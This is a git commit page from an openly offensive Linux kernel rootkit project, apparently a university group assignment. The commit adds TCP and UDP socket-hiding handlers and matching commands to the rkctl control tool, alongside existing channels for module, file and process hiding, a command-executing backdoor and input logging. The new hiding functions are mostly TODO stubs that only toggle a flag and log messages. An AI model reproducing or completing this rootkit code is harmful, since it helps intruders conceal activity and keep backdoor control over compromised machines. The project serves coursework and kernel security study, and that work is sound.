adds {TCP,UDP} socket hiding handlers - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 5520c73abf9e251b66a4dfd133a6976f2e3958fe
parent 9c38d818c12d8d446b4fae4ced617aa56f8cdbc2
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 13 Dec 2020 01:03:21 +0100

adds {TCP,UDP} socket hiding handlers

Diffstat:
M src/channel.c  | 56 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
M src/channel.h  | 2 ++
M src/g7.c  | 11 ++++++-----
M src/ioctl.h  | 8 +++++---
M src/rkctl/rkctl.c  | 38 ++++++++++++++++++++++++++++++++++++++
M src/rkctl/rkctl.h  | 2 ++
M src/rootkit.h  | 1 +

7 files changed, 110 insertions(+), 8 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -30,6 +30,8 @@ report_channels(void)
     DEBUG_NOTICE("%-24s %#10lx\n", "FILEHIDE", G7_FILEHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "OPENHIDE", G7_OPENHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID",  G7_PIDHIDE);
+    DEBUG_NOTICE("%-24s %#10lx\n", "TCPHIDE",  G7_TCPHIDE);
+    DEBUG_NOTICE("%-24s %#10lx\n", "UDPHIDE",  G7_UDPHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
     DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
     DEBUG_NOTICE("%-24s %#10lx\n", "LOGGING",  G7_LOGGING);
@@ -45,6 +47,8 @@ detect_channel(unsigned cmd)
     case G7_FILEHIDE: return (channel_t){ "FILEHIDE", handle_filehide };
     case G7_OPENHIDE: return (channel_t){ "OPENHIDE", handle_openhide };
     case G7_PIDHIDE:  return (channel_t){ "HIDEPID",  handle_pidhide  };
+    case G7_TCPHIDE:  return (channel_t){ "TCPHIDE",  handle_tcphide  };
+    case G7_UDPHIDE:  return (channel_t){ "UDPHIDE",  handle_udphide  };
     case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
     case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
     case G7_LOGGING:  return (channel_t){ "LOGGING",  handle_logging  };
@@ -176,6 +180,58 @@ handle_pidhide(unsigned long arg)
 }
 
 int
+handle_tcphide(unsigned long arg)
+{
+    long sarg = (long)arg;
+
+    if (!sarg) {
+        // TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+        rootkit.hiding_sockets = 0;
+        DEBUG_NOTICE("[g7] socket hiding off\n");
+    } else if (sarg < 0) {
+        // TODO unhide tcp socket for port `-sarg`
+        DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
+    } else if (sarg > 0) {
+        if (!rootkit.hiding_sockets) {
+            // TODO toggle hiding back on
+            DEBUG_NOTICE("[g7] socket hiding on\n");
+        }
+
+        // TODO hide tcp socket for port `sarg`
+        rootkit.hiding_sockets = 1;
+        DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
+    }
+
+    return 0;
+}
+
+int
+handle_udphide(unsigned long arg)
+{
+    long sarg = (long)arg;
+
+    if (!sarg) {
+        // TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+        rootkit.hiding_sockets = 0;
+        DEBUG_NOTICE("[g7] socket hiding off\n");
+    } else if (sarg < 0) {
+        // TODO unhide udp socket for port `-sarg`
+        DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
+    } else if (sarg > 0) {
+        if (!rootkit.hiding_sockets) {
+            // TODO toggle hiding back on
+            DEBUG_NOTICE("[g7] socket hiding on\n");
+        }
+
+        // TODO hide udp socket for port `sarg`
+        rootkit.hiding_sockets = 1;
+        DEBUG_NOTICE("[g7] hiding udp socket with port %ld\n", sarg);
+    }
+
+    return 0;
+}
+
+int
 handle_backdoor(unsigned long arg)
 {
     char buf[BUFLEN];
diff --git a/src/channel.h b/src/channel.h
@@ -15,6 +15,8 @@ int handle_modhide(unsigned long);
 int handle_filehide(unsigned long);
 int handle_openhide(unsigned long);
 int handle_pidhide(unsigned long);
+int handle_tcphide(unsigned long);
+int handle_udphide(unsigned long);
 int handle_backdoor(unsigned long);
 int handle_togglebd(unsigned long);
 int handle_logging(unsigned long);
diff --git a/src/g7.c b/src/g7.c
@@ -40,11 +40,12 @@ static struct file_operations g7_fops =
 
 
 rootkit_t rootkit = {
-    .hiding_module = true,
-    .hiding_files  = true,
-    .hiding_open   = true,
-    .hiding_pids   = true,
-    .logging_input = false,
+    .hiding_module  = true,
+    .hiding_files   = true,
+    .hiding_open    = true,
+    .hiding_pids    = true,
+    .hiding_sockets = true,
+    .logging_input  = false,
     .backdoor = BD_TTY,
 };
 
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -9,8 +9,10 @@
 #define G7_FILEHIDE _IOR(G7_MAGIC_NUMBER, 0x2, char *)
 #define G7_OPENHIDE _IOR(G7_MAGIC_NUMBER, 0x3, char *)
 #define G7_PIDHIDE  _IOR(G7_MAGIC_NUMBER, 0x4, char *)
-#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x5, char *)
-#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x6, char *)
-#define G7_LOGGING  _IOR(G7_MAGIC_NUMBER, 0x7, char *)
+#define G7_TCPHIDE  _IOR(G7_MAGIC_NUMBER, 0x5, char *)
+#define G7_UDPHIDE  _IOR(G7_MAGIC_NUMBER, 0x6, char *)
+#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x7, char *)
+#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x8, char *)
+#define G7_LOGGING  _IOR(G7_MAGIC_NUMBER, 0x9, char *)
 
 #endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -92,6 +92,32 @@ parse_input(int argc, char **argv)
     if (ARGVCMP(1, "hidepid-off"))
             return (cmd_t){ handle_pidhide, (void *)0 };
 
+    if (ARGVCMP(1, "socket")) {
+        ASSERT_ARGC(4, "socket <hide | unhide> <tcp | udp> <port>");
+
+        long arg;
+        if ((arg = strtol(argv[4], NULL, 10))) {
+            if (ARGVCMP(2, "hide")) {
+                if (ARGVCMP(3, "tcp"))
+                    return (cmd_t){ handle_tcphide, (void *)arg };
+
+                if (ARGVCMP(3, "udp"))
+                    return (cmd_t){ handle_udphide, (void *)arg };
+            }
+
+            if (ARGVCMP(2, "unhide")){
+                if (ARGVCMP(3, "tcp"))
+                    return (cmd_t){ handle_tcphide, (void *)((-1) * (arg)) };
+
+                if (ARGVCMP(3, "udp"))
+                    return (cmd_t){ handle_udphide, (void *)((-1) * (arg)) };
+            }
+        } else {
+            fprintf(stderr, "%s: invalid port `%s`\n", progname, argv[3]);
+            exit(1);
+        }
+    }
+
     if (ARGVCMP(1, "backdoor")) {
         ASSERT_ARGC(2, "backdoor <execve_command>");
         return (cmd_t){ handle_backdoor, (void *)argv[2] };
@@ -160,6 +186,18 @@ handle_pidhide(void *arg)
 }
 
 int
+handle_tcphide(void *arg)
+{
+    return issue_ioctl(G7_TCPHIDE, (const char *)arg);
+}
+
+int
+handle_udphide(void *arg)
+{
+    return issue_ioctl(G7_UDPHIDE, (const char *)arg);
+}
+
+int
 handle_backdoor(void *arg)
 {
     return issue_ioctl(G7_BACKDOOR, (const char *)arg);
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -25,6 +25,8 @@ int handle_modhide(void *);
 int handle_filehide(void *);
 int handle_openhide(void *);
 int handle_pidhide(void *);
+int handle_tcphide(void *);
+int handle_udphide(void *);
 int handle_backdoor(void *);
 int handle_shellbd(void *);
 int handle_togglebd(void *);
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -15,6 +15,7 @@ typedef struct {
     bool hiding_files;
     bool hiding_pids;
     bool hiding_open;
+    bool hiding_sockets;
     bool logging_input;
     bd_state_t backdoor;
 } rootkit_t;

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs

M	src/channel.c	\|	56	++++++++++++++++++++++++++++++++++++++++++++++++++++++++
M	src/channel.h	\|	2	++
M	src/g7.c	\|	11	++++++-----
M	src/ioctl.h	\|	8	+++++---
M	src/rkctl/rkctl.c	\|	38	++++++++++++++++++++++++++++++++++++++
M	src/rkctl/rkctl.h	\|	2	++
M	src/rootkit.h	\|	1	+